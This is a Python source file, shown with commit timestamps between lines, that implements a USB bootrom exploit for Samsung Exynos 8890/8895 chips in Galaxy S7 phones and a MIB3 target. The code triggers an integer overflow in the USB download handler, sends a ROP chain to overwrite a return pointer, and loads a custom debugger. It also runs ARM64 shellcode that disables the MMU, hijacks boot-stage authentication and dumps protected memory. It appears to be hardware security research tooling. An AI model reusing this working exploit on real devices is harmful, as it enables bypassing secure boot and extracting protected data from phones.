2024-12-07 20:59:02 +01:00
from exynos import *
2024-08-02 15:51:35 +02:00
2024-08-05 19:37:13 +02:00
logger = setup_logger ( " " ) #Leave empty to get root logger
logger . setLevel ( logging . DEBUG )
2024-08-02 15:51:35 +02:00
BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
2024-08-07 19:13:35 +02:00
MAX_PAYLOAD_SIZE = ( BLOCK_SIZE - 10 ) # 512, - 10 for ready (4), size (4), footer (2)
2024-08-02 15:51:35 +02:00
DL_BUFFER_START = 0x02021800
2024-08-07 19:13:35 +02:00
DL_BUFFER_SIZE = 0x4E800 #max allowed/usable size within the buffer, with end at 0x02070000
2024-08-02 15:51:35 +02:00
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
2024-08-07 19:13:35 +02:00
" 8890 " : ( 0x02021800 , 0x02020F08 , 0x02070000 ) , #0x206ffff on exynos 8890
2024-08-02 15:51:35 +02:00
" 8895 " : ( 0x02021800 , 0x02020F18 , 0x02070000 )
}
2024-08-16 10:11:18 +02:00
def wait_for_device ( ) :
while usb . core . find ( idVendor = 0x04e8 , idProduct = 0x1234 ) is None :
pass
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
def wait_disconnect ( ) :
while usb . core . find ( idVendor = 0x04e8 , idProduct = 0x1234 ) is not None :
pass
2024-08-02 15:51:35 +02:00
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
2024-08-05 14:51:04 +02:00
ks = Ks ( KS_ARCH_ARM64 , KS_MODE_LITTLE_ENDIAN )
cs = Cs ( CS_ARCH_ARM64 , CS_MODE_LITTLE_ENDIAN )
2024-12-07 20:59:02 +01:00
class S7Exploit ( ExynosDevice ) :
2024-08-02 15:51:35 +02:00
def __init__ ( self , idVendor = 0x04e8 , idProduct = 0x1234 ) :
2024-12-07 20:59:02 +01:00
super ( ) . __init__ ( idVendor , idProduct )
2024-08-02 15:51:35 +02:00
def send_empty_transfer ( self ) :
2024-08-16 18:15:53 +02:00
""" Send an empty transfer (to not actually write data) """
2024-08-02 15:51:35 +02:00
transferred = ctypes . c_int ( )
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , 0 , 0 , ctypes . byref ( transferred ) , 0 )
assert ( res == 0 )
2024-08-05 14:51:04 +02:00
return transferred . value
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
def test_bug_2 ( self ) :
2024-08-08 19:46:04 +02:00
""" Interger overflow in last packet if reamining size is 1. """
2024-08-02 15:51:35 +02:00
transferred = ctypes . c_int ( )
bug_payload = p32 ( 0 ) + p32 ( 0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7 ) + b " \x00 " * MAX_PAYLOAD_SIZE + p16 ( 0 )
bug_payload + = b " \xcc " * ( BLOCK_SIZE - len ( bug_payload ) )
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , bug_payload , len ( bug_payload ) , ctypes . byref ( transferred ) , 0 )
assert res == 0
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
payload = b " \xaa " * 0x200
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , payload , len ( payload ) , ctypes . byref ( transferred ) , 0 )
assert res == 0
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
payload = b " \xaa " * 0x200
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , payload , len ( payload ) , ctypes . byref ( transferred ) , 0 )
while True :
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , payload , len ( payload ) , ctypes . byref ( transferred ) , 10 )
2024-08-07 19:13:35 +02:00
2024-08-02 15:51:35 +02:00
def test_bug ( self ) :
2024-08-16 18:15:53 +02:00
""" Verify bug existence """
2024-08-02 15:51:35 +02:00
# Start by sending a valid packet
# Integer overflow in the size field
# unk + size + payload + header
payload = p32 ( 0 ) + p32 ( 0xFDFDE7FF + 0x1000 ) + b " \x00 " * MAX_PAYLOAD_SIZE + p16 ( 0 )
assert ( len ( payload ) == BLOCK_SIZE )
2024-10-23 19:24:09 +02:00
res = self . write ( payload , MAX_PAYLOAD_SIZE )
2024-08-02 15:51:35 +02:00
2024-10-23 19:24:09 +02:00
for i in range ( 200 ) :
2024-08-02 15:51:35 +02:00
print ( hex ( self . send_empty_transfer ( ) ) )
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
print ( ' Bug probably available ' )
sys . exit ( 0 )
2024-08-08 19:46:04 +02:00
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
def send_normal_stage ( self , payload ) :
2024-09-10 18:59:32 +02:00
""" Send next boot stage to the device """
2024-08-02 15:51:35 +02:00
# construct dl_data
2024-10-23 19:24:09 +02:00
dpayload = struct . pack ( " <II " , 0 , ( len ( payload ) + 8 + 2 ) )
2024-08-16 10:11:18 +02:00
dpayload = dpayload + payload + b " \x00 " * 2 # add footer
2024-10-23 19:24:09 +02:00
transferred = ctypes . c_int ( )
2024-08-16 10:11:18 +02:00
for block in range ( 0 , len ( dpayload ) , BLOCK_SIZE ) :
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , dpayload [ block : block + BLOCK_SIZE ] , len ( dpayload [ block : block + BLOCK_SIZE ] ) , ctypes . byref ( transferred ) , 0 )
assert res == 0 , " Error sending payload "
2024-08-16 18:15:53 +02:00
p_ok ( " Sent stage " )
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
def unsecure_boot ( self , exploit = False ) :
'''
Do a normal boot process , with or without exploit .
'''
2024-11-12 20:58:34 +01:00
bl1 = open ( " ../S7/g930f_latest/g930f_sboot.bin.1.bin " , " rb " ) . read ( )
bl31 = open ( " ../S7/g930f_latest/g930f_sboot.bin.2.bin " , " rb " ) . read ( )
bl2 = open ( " ../S7/g930f_latest/g930f_sboot.bin.3.bin " , " rb " ) . read ( )
bl33 = open ( " ../S7/g930f_latest/g930f_sboot.bin.4.bin " , " rb " ) . read ( )
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-11-12 20:58:34 +01:00
bl1 = open ( " ../mib3/boot_partitions/fwbl1_a.bin " , " rb " ) . read ( )
bl31 = open ( " ../mib3/boot_partitions/el3_mon_a.bin " , " rb " ) . read ( )
bl2 = open ( " ../mib3/boot_partitions/bl2_a.bin " , " rb " ) . read ( )
bl33 = open ( " ../mib3/boot_partitions/u-boot_a.bin " , " rb " ) . read ( )
off = bl31 . find ( b ' Built ' )
bl31 = bl31 [ : off ] + b ' Built ' + bl31 [ off + len ( b ' Built ' ) : ]
2024-08-16 18:15:53 +02:00
if exploit :
self . exploit ( open ( " ../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin " , " rb " ) . read ( ) )
time . sleep ( 2 )
self . connect_device ( )
2024-11-12 20:58:34 +01:00
self . send_normal_stage ( bl1 )
2024-08-16 10:11:18 +02:00
time . sleep ( 2 )
self . connect_device ( )
2024-11-12 20:58:34 +01:00
self . send_normal_stage ( bl31 )
2024-08-16 10:11:18 +02:00
time . sleep ( 2 )
self . connect_device ( )
2024-11-12 20:58:34 +01:00
self . send_normal_stage ( bl2 )
2024-08-16 10:11:18 +02:00
time . sleep ( 2 )
self . connect_device ( )
2024-11-12 20:58:34 +01:00
self . send_normal_stage ( bl33 )
2024-08-02 15:51:35 +02:00
pass
2024-08-16 18:15:53 +02:00
2024-08-02 15:51:35 +02:00
def exploit ( self , payload : bytes ) :
2024-08-05 14:51:04 +02:00
'''
2024-10-23 19:24:09 +02:00
Exploit the Exynos device , payload of 502 bytes max . This will send stage1 payload .
2024-08-05 14:51:04 +02:00
'''
2024-08-08 19:46:04 +02:00
assert len ( payload ) < = MAX_PAYLOAD_SIZE , " Shellcode too big "
2024-08-02 15:51:35 +02:00
current_offset = TARGET_OFFSETS [ self . target ] [ 0 ]
2024-08-07 19:13:35 +02:00
xfer_buffer_start = TARGET_OFFSETS [ self . target ] [ 1 ] # start of USB transfer buffer
2024-08-02 15:51:35 +02:00
transferred = ctypes . c_int ( )
2024-10-23 19:24:09 +02:00
2024-08-07 19:13:35 +02:00
size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 - header(8) + data(n) + footer(2)
#size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
2024-08-02 15:51:35 +02:00
max_payload_size = 0x100000000 - size_to_overflow
2024-10-23 19:24:09 +02:00
ram_size = ( ( size_to_overflow % CHUNK_SIZE ) % BLOCK_SIZE ) #
2024-08-08 19:46:04 +02:00
# Assert that payload is 502 bytes
2024-08-02 15:51:35 +02:00
payload = payload + ( ( max_payload_size - len ( payload ) ) * b " \x00 " )
2024-09-10 18:59:32 +02:00
assert len ( payload ) == max_payload_size , " Invalid payload. Size is wrong "
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
# First send payload to trigger the bug
bug_payload = p32 ( 0 ) + p32 ( size_to_overflow ) + payload [ : MAX_PAYLOAD_SIZE ] # dummy packet for triggering the bug
bug_payload + = b " \xcc " * ( BLOCK_SIZE - len ( bug_payload ) )
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , bug_payload , len ( bug_payload ) , ctypes . byref ( transferred ) , 0 )
assert res == 0 , " Error triggering payload "
assert transferred . value == len ( bug_payload ) , " Invalid transfered size "
current_offset + = len ( bug_payload ) - 8 # Remove header
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
cnt = 0
while True :
2024-08-07 19:13:35 +02:00
if current_offset + CHUNK_SIZE > = xfer_buffer_start and current_offset < xfer_buffer_start :
2024-08-02 15:51:35 +02:00
break
self . send_empty_transfer ( )
current_offset + = CHUNK_SIZE
cnt + = 1
if current_offset > 0x100000000 :
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print ( f " { cnt } { hex ( current_offset ) } " )
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
remaining = ( TARGET_OFFSETS [ self . target ] [ 1 ] - current_offset )
assert remaining != 0 , " Invalid remaining, needs to be > 0 in order to overwrite with the last packet "
if remaining > BLOCK_SIZE :
self . send_empty_transfer ( )
# Send last transfer, TODO who aligns this ROM??
current_offset + = ( ( remaining / / BLOCK_SIZE ) * BLOCK_SIZE )
cnt + = 1
print ( f " { cnt } { hex ( current_offset ) } " )
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
# Build ROP chain.
rop_chain = ( b " \x00 " * ( ram_size - 6 ) ) + p64 ( TARGET_OFFSETS [ self . target ] [ 0 ] ) + ( b " \x00 " * 2 )
transferred = ctypes . c_int ( 0 )
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , rop_chain , len ( rop_chain ) , ctypes . byref ( transferred ) , 0 )
assert res == 0 , " Error sending ROP chain "
2024-08-16 18:15:53 +02:00
return
2024-12-07 21:02:52 +01:00
2024-08-16 18:15:53 +02:00
2024-08-05 19:37:13 +02:00
def setup_concrete_device ( self , concrete_device : ConcreteDevice ) :
#Setup architecture
concrete_device . arch = QL_ARCH . ARM64
concrete_device . ga_debugger_location = 0x2069000 # TODO, not used yet
concrete_device . ga_vbar_location = 0x206d000 + 0x1000
concrete_device . ga_storage_location = 0x206d000
concrete_device . ga_stack_location = 0x206b000
2024-10-23 19:24:09 +02:00
2024-08-05 19:37:13 +02:00
concrete_device . arch_dbg = GA_arm64_debugger ( concrete_device . ga_vbar_location , concrete_device . ga_debugger_location , concrete_device . ga_storage_location )
concrete_device . arch_dbg . read = self . usb_read
concrete_device . arch_dbg . write = self . usb_write
#Overwrite all calls to make the concrete target function properly
concrete_device . copy_functions ( )
2024-08-08 19:46:04 +02:00
2024-08-16 18:15:53 +02:00
2024-08-08 19:46:04 +02:00
def usb_debug ( self ) :
"""
2024-08-09 22:16:13 +02:00
Function to debug USB behaviour . Sends and receives data in continuous flow .
2024-08-08 19:46:04 +02:00
"""
transferred = ctypes . c_int ( )
# Send some data
count = 0
def _send_data ( ) :
transferred . value = 0
p = p32 ( count ) + b " \xaa " * ( 0x200 - 4 )
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , ENDPOINT_BULK_OUT , p , len ( p ) , ctypes . byref ( transferred ) , 100 )
assert res == 0 , f " Error sending data ( { res } ) "
2024-10-23 19:24:09 +02:00
2024-08-08 19:46:04 +02:00
def _recv_data ( ) :
transferred . value = 0
buf = ctypes . c_buffer ( b " " , 0x200 )
2024-10-23 19:24:09 +02:00
res = libusb1 . libusb_bulk_transfer ( self . handle . _USBDeviceHandle__handle , 0x81 , buf , len ( buf ) , ctypes . byref ( transferred ) , 100 )
2024-08-08 19:46:04 +02:00
assert res == 0 , f " Error receiving data ( { res } ) "
hexdump ( buf . raw )
2024-10-23 19:24:09 +02:00
2024-08-08 19:46:04 +02:00
# Should have received some bytes
while True :
_send_data ( )
_recv_data ( )
count + = 1
2024-08-16 18:15:53 +02:00
2024-08-26 17:45:29 +02:00
def dump_memory ( self , start : hex = 0x0 , end : hex = 0x02070000 , write = False ) :
2024-08-09 22:16:13 +02:00
"""
Dumps memory from the device .
Transfer XFER_BUFFER at 0x02021800 , to : 0x02020F08 . End of memory at 0x0206ffff .
"""
dumped = b " "
# Read data from memory
2024-08-26 17:45:29 +02:00
try :
for block in tqdm . tqdm ( range ( start , end , 0x6000 ) ) :
dump = self . cd . memdump_region ( block , 0x6000 )
dumped + = dump
except :
print ( " Error reading memory, at block: " , hex ( block ) )
2024-08-09 22:16:13 +02:00
return dumped
def setup_guppy_debugger ( self ) :
"""
Sets up guppy debugger on the device itself .
"""
2024-10-23 19:24:09 +02:00
2024-08-09 22:16:13 +02:00
def _setup_debugger ( ) :
'''
Setup the debugger as a concrete device
'''
self . cd = ConcreteDevice ( None , False )
self . cd . dev = self . setup_concrete_device ( self . cd )
self . cd . test_connection ( )
def _initial_run_debugger ( ) :
""" Write debugger to device and test basic functionality """
2024-08-28 18:45:05 +02:00
### Setup debugger
2024-08-09 22:16:13 +02:00
if os . getenv ( " USER " ) == " eljakim " :
2024-08-28 18:45:05 +02:00
debugger = open ( " /home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin " , " rb " ) . read ( )
2024-08-09 22:16:13 +02:00
else :
try :
debugger = open ( " ../../dump/debugger.bin " , " rb " ) . read ( )
except Exception as e :
print ( f ' Are you missing your debugger? Please ensure it is present in dump/debugger.bin. { e } ' )
sys . exit ( 0 )
2024-08-28 18:45:05 +02:00
2024-08-09 22:16:13 +02:00
debugger + = ( ( 0x2000 - len ( debugger ) ) * b " \x00 " )
assert len ( debugger ) == 0x2000 , " Invalid debugger size, stage1 requires 0x2000 size "
for block in range ( 0 , len ( debugger ) , 0x200 ) :
self . usb_write ( debugger [ block : block + 0x200 ] )
# time.sleep(.5) # Wait a little bit
assert self . usb_read ( 0x200 ) == b " GiAs " , " No response from debugger "
2024-10-23 19:24:09 +02:00
2024-08-09 22:16:13 +02:00
# Test basic functionality
self . usb_write ( b " PING " )
r = self . usb_read ( 0x200 )
assert r == b " PONG " , f " Invalid response from device: { r } "
2024-10-23 19:24:09 +02:00
2024-08-09 22:16:13 +02:00
_initial_run_debugger ( )
_setup_debugger ( )
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
2024-08-29 21:06:15 +02:00
def relocate_debugger ( self , debugger = None , entry = 0x020c0000 , storage = 0x020c4000 , g_data_received = 0x020c6000 , alternative_size = 0x1000 ) :
2024-08-28 18:45:05 +02:00
"""
Relocates the debugger to another location . Make sure to have built the debugger with the correct addresses !
2024-08-16 18:15:53 +02:00
2024-08-28 18:45:05 +02:00
Args :
- debugger : The debugger to relocate . If None , it will use the default debugger .
- entry : The entry point of the debugger .
- storage : The storage location of the debugger .
- g_data_received : The location of the data received .
"""
if debugger is None :
if os . getenv ( " USER " ) == " eljakim " :
debugger_reloc = open ( " /home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin " , " rb " ) . read ( )
else :
try :
debugger_reloc = open ( " ../../dump/reloc_debugger.bin " , " rb " ) . read ( )
except Exception as e :
print ( f ' Are you missing your debugger? Please ensure it is present in dump/debugger.bin. { e } ' )
sys . exit ( 0 )
2024-08-17 20:35:52 +02:00
else :
2024-08-28 18:45:05 +02:00
debugger_reloc = debugger
2024-08-17 20:35:52 +02:00
2024-08-28 18:45:05 +02:00
self . cd . memwrite_region ( entry , debugger_reloc )
2024-08-17 20:35:52 +02:00
# self.usb_write(b"FLSH") # Flush cache
2024-08-28 18:45:05 +02:00
self . cd . restore_stack_and_jump ( entry )
2024-08-17 20:35:52 +02:00
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to relocate debugger "
2024-08-29 21:06:15 +02:00
self . cd . relocate_debugger ( g_data_received + alternative_size , entry , storage ) #0x20c7000, 0x20c0000, 0x20c4000
2024-10-23 19:24:09 +02:00
2024-08-23 18:05:06 +02:00
2024-08-12 18:58:49 +02:00
def dumb_interact ( self , dump_imems = False ) :
2024-08-05 19:37:13 +02:00
'''
2024-08-16 18:15:53 +02:00
Room for playing around with the debugger on the phone .
2024-08-05 19:37:13 +02:00
'''
self . cd . arch_dbg . state . auto_sync = False
2024-08-09 12:57:34 +02:00
self . cd . arch_dbg . state . auto_sync_special = False
2024-08-12 18:58:49 +02:00
logger . debug ( ' State after setting up initial debugger ' )
2024-08-05 19:37:13 +02:00
self . cd . arch_dbg . state . print_ctx ( )
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
def first_debugger ( ) :
debugger = open ( " /home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin " , " rb " ) . read ( )
self . cd . memwrite_region ( 0x2069000 , debugger )
self . cd . restore_stack_and_jump ( 0x2069000 )
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to relocate debugger "
self . cd . relocate_debugger ( 0x206d000 + 0x1000 , 0x2069000 , 0x206d000 )
2024-08-12 18:58:49 +02:00
2024-08-16 18:15:53 +02:00
# self.relocate_debugger()
2024-08-16 10:11:18 +02:00
DEBUGGER_ADDR = 0x2069000 #0x020c0000
2024-08-12 18:58:49 +02:00
2024-08-16 18:15:53 +02:00
### Get whereabouts of the debugger and current processor state
2024-08-12 18:58:49 +02:00
logger . debug ( ' State after relocating debugger ' )
self . cd . arch_dbg . state . print_ctx ( )
2024-10-23 19:24:09 +02:00
2024-08-09 22:22:16 +02:00
def memdump_imem ( ) :
2024-08-16 18:15:53 +02:00
"""
Dumps the internal memory of the device ( 0x2020000 - 0x2070000 ) .
"""
2024-08-09 22:22:16 +02:00
dumped = b " "
for block in range ( 0x2020000 , 0x2070000 , 0x200 ) :
# print(hex(block))
dumped + = self . cd . memdump_region ( block , 0x200 )
return dumped
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
AUTH_BL1 = 0x00012848 # Location of the authentication function
2024-08-16 10:11:18 +02:00
def auth_bl1 ( lr = 0x2069000 ) :
# Load the firmware
self . cd . arch_dbg . state . X0 = 1
self . cd . arch_dbg . state . X1 = 1
self . cd . arch_dbg . state . LR = lr #jump back to debugger when finished
self . cd . restore_stack_and_jump ( AUTH_BL1 )
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
assert self . cd . arch_dbg . state . X0 == 0 , " auth_bl1 returned with error! "
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
BOOT_BL1 = 0x00019310 # Location of the boot function
2024-08-16 10:11:18 +02:00
def boot_bl1 ( lr = 0x2069000 ) :
self . cd . arch_dbg . state . LR = lr
self . cd . restore_stack_and_jump ( BOOT_BL1 )
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
2024-08-16 10:11:18 +02:00
def jump_bl1 ( lr ) :
self . cd . arch_dbg . state . LR = lr
self . cd . restore_stack_and_jump ( JUMP_BL1 )
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
# Always hijack rom_usb_download function:
rom_usb_download = self . cd . memdump_region ( 0x020200dc , 4 )
self . cd . memwrite_region ( 0x020200dc , p32 ( 0x2069000 ) )
2024-10-23 19:24:09 +02:00
2024-08-09 12:57:34 +02:00
# Try loading bl1
bl1 = open ( " ../S7/bl1.bin " , " rb " ) . read ( )
2024-08-16 10:11:18 +02:00
self . cd . memwrite_region ( 0x02021800 , bl1 )
2024-08-16 18:15:53 +02:00
self . usb_write ( b " FLSH " ) # Flush cache, as Frederic does
2024-10-23 19:24:09 +02:00
self . cd . test_connection ( )
2024-08-16 10:11:18 +02:00
auth_bl1 ( DEBUGGER_ADDR )
# boot_bl1(DEBUGGER_ADDR)
self . cd . memwrite_region ( 0x02022858 , self . cd . arch_dbg . sc . branch_absolute ( DEBUGGER_ADDR ) ) # jump to debugger on next stage download
self . cd . memwrite_region ( 0x020219cc , self . cd . arch_dbg . sc . branch_absolute ( DEBUGGER_ADDR ) )
jump_bl1 ( DEBUGGER_ADDR )
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
# Returns on usb_download function
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
self . cd . arch_dbg . state . print_ctx ( )
2024-10-23 19:24:09 +02:00
dl_ready , next_stage = struct . unpack ( " <II " , self . cd . memdump_region ( 0x02021518 , 8 ) )
2024-08-16 10:11:18 +02:00
bl31 = open ( " ../S7/bl31.bin " , " rb " ) . read ( )
self . cd . memwrite_region ( 0x02024000 , bl31 )
self . cd . memwrite_region ( 0x02021518 , p32 ( 1 ) ) # Set dl_ready to 1
self . cd . memwrite_region ( 0x02021518 + 4 , p32 ( self . cd . arch_dbg . state . X0 ) )
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
self . cd . arch_dbg . state . X0 = 0
self . cd . restore_stack_and_jump ( 0x020219c8 )
pass
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
# assert len(bl31) % 0x200 == 0, "Size needs to be 512 bytes aligned"
# self.cd.memwrite_region(self.cd.arch_dbg.state.X0, p32(147456)) # Update amount of blocks
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
# self.cd.restore_stack_and_jump(0x02022a08)
# Patches
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
# Patch stupid error function
2024-08-16 10:11:18 +02:00
# self.usb_write(b"FLSH") # Flush cache
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
# Download next stage?
lr = self . cd . arch_dbg . state . LR
2024-10-23 19:24:09 +02:00
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
2024-08-16 10:11:18 +02:00
pass
2024-08-12 18:58:49 +02:00
2024-08-13 16:42:17 +02:00
# Overwrite jump back to the debugger from functions encountered during jump_bl1
2024-08-14 19:46:27 +02:00
self . cd . memwrite_region ( 0x020200e8 , p32 ( 0x020c0000 ) ) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
2024-08-12 18:58:49 +02:00
self . cd . memwrite_region ( 0x020200dc , p32 ( 0x020c0000 ) )
2024-10-23 19:24:09 +02:00
2024-08-12 18:58:49 +02:00
def hijack_brom_weird ( ) :
2024-08-16 10:11:18 +02:00
print ( f " From = { hex ( self . cd . arch_dbg . state . LR - 4 ) } X0 = { hex ( self . cd . arch_dbg . state . X0 ) } " )
2024-08-12 18:58:49 +02:00
self . cd . restore_stack_and_jump ( 0x00000314 )
2024-08-09 22:22:16 +02:00
jump_bl1 ( 0x020c0000 )
2024-08-16 10:11:18 +02:00
def handle_weird_brom ( ) :
while True :
try :
resp = self . usb_read ( 0x200 )
logging . debug ( f ' Within jump_bl1. Response: { resp } . ' )
if self . cd . arch_dbg . state . LR == 0x02022948 :
break # ROM will load next stage over USB
hijack_brom_weird ( )
except Exception as e :
pass
handle_weird_brom ( )
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
2024-08-16 10:11:18 +02:00
# self.cd.jump_to(0x2069000)
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# self.cd.fetch_special_regs()
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
self . cd . memwrite_region ( 0x02022a08 , self . cd . arch_dbg . sc . mov_0_w0_ins + self . cd . arch_dbg . sc . ret_ins )
2024-10-23 19:24:09 +02:00
2024-08-16 10:11:18 +02:00
self . cd . arch_dbg . state . X0 = 1
self . cd . restore_stack_and_jump ( self . cd . arch_dbg . state . LR )
self . usb_read ( 0x200 ) # GiAs
self . cd . arch_dbg . state . LR = 0x2069000
self . cd . restore_stack_and_jump ( 0x00000314 )
pass
2024-10-23 19:24:09 +02:00
2024-08-16 18:15:53 +02:00
### UXN and PXN seem to be present over the USB stack (02021800+)
2024-08-14 19:46:27 +02:00
shellcode = f """
ldr x0 , debugger_addr
blr x0
2024-08-29 21:06:15 +02:00
debugger_addr : . quad 0x02022000
2024-08-14 19:46:27 +02:00
"""
2024-08-13 16:42:17 +02:00
2024-08-14 19:46:27 +02:00
shellcode = ks . asm ( shellcode , as_bytes = True ) [ 0 ]
self . cd . memwrite_region ( 0x2021800 , shellcode )
2024-08-13 16:42:17 +02:00
2024-08-14 19:46:27 +02:00
self . cd . jump_to ( 0x2021800 )
2024-08-13 16:42:17 +02:00
pass
2024-08-14 19:46:27 +02:00
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
# # Write bl31 at 0x02021800 and authenticate
2024-10-23 19:24:09 +02:00
2024-08-14 19:46:27 +02:00
auth_bl1 ( 0x020c0000 )
2024-08-13 16:42:17 +02:00
2024-08-14 19:46:27 +02:00
# Jump to bl31
jump_bl1 ( 0x02021800 )
pass
2024-08-13 16:42:17 +02:00
2024-08-16 18:15:53 +02:00
# VERY OLD
2024-10-23 19:24:09 +02:00
2024-08-07 00:20:30 +02:00
#000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
2024-08-28 18:45:05 +02:00
2024-09-10 18:59:32 +02:00
def disable_mmu ( self , address = 0x02060000 ) :
# ================= WORKS TO DISABLE DEBUGGER. BUT UNNECESSARY =================
# Disable MMU and branch to 0x02048000
shellcode = f """
mrs x0 , sctlr_el3
bic x0 , x0 , #1
msr sctlr_el3 , x0
ldr x0 , = 0x2048000
br x0
"""
shellcode = ks . asm ( shellcode , as_bytes = True ) [ 0 ]
self . cd . memwrite_region ( address , shellcode )
self . cd . jump_to ( address )
time . sleep ( 1 )
self . usb_read ( 0x200 ) # GiAs
self . cd . arch_dbg . fetch_special_regs ( )
print ( f ' MMU is { hex ( self . cd . arch_dbg . state . R_SCTLR_EL3 . mmu ) } (0x1=enabled, 0x0=disabled) ' )
2024-10-23 19:24:09 +02:00
2024-09-10 18:59:32 +02:00
2024-08-28 18:45:05 +02:00
def get_ttbr0_el3 ( self ) :
2024-08-29 21:06:15 +02:00
"""
Get the TTBR0_EL3 register using opcode .
"""
2024-08-28 18:45:05 +02:00
shellcode = f """
mov x1 , lr
mrs x0 , ttbr0_el3
2024-08-29 21:06:15 +02:00
ldr x2 , = 0x206fd10
2024-08-28 18:45:05 +02:00
str x0 , [ x2 ]
mov lr , x1
ret
"""
shellcode = ks . asm ( shellcode , as_bytes = True ) [ 0 ]
2024-08-29 21:06:15 +02:00
self . cd . memwrite_region ( 0x206ed10 , shellcode )
self . cd . jump_to ( 0x0206ed10 )
ttbr0 = u64 ( self . cd . memdump_region ( 0x0206fd10 , 0x8 ) )
2024-08-28 18:45:05 +02:00
print ( f " TTBR0_EL3: { hex ( ttbr0 ) } " )
print ( f " Bits: { ttbr0 : 064b } " )
# Overwrite it with 0's
2024-08-29 21:06:15 +02:00
self . cd . memwrite_region ( 0x0206ed10 , b " \x00 " * 0x8 )
ttbr0 = self . cd . memdump_region ( 0x206ed10 , 0x8 )
assert ttbr0 == b " \x00 " * 0x8 , " TTBR0_EL3 not overwritten "
2024-09-24 18:50:11 +02:00
def test_write_execute ( self , address , execute = True ) :
2024-08-29 21:06:15 +02:00
"""
At given address , test if it is possible to write and execute code , by writing a simple jump to , and jump back .
"""
self . usb_write ( b ' PING ' )
assert self . usb_read ( 0x200 ) == b ' PONG ' , " Debugger not alive before test "
shellcode = f """
2024-10-23 19:24:09 +02:00
mov x1 , lr
ret
2024-08-29 21:06:15 +02:00
"""
shellcode = ks . asm ( shellcode , as_bytes = True ) [ 0 ]
self . cd . memwrite_region ( address , shellcode )
2024-09-24 18:50:11 +02:00
if execute :
self . cd . jump_to ( address )
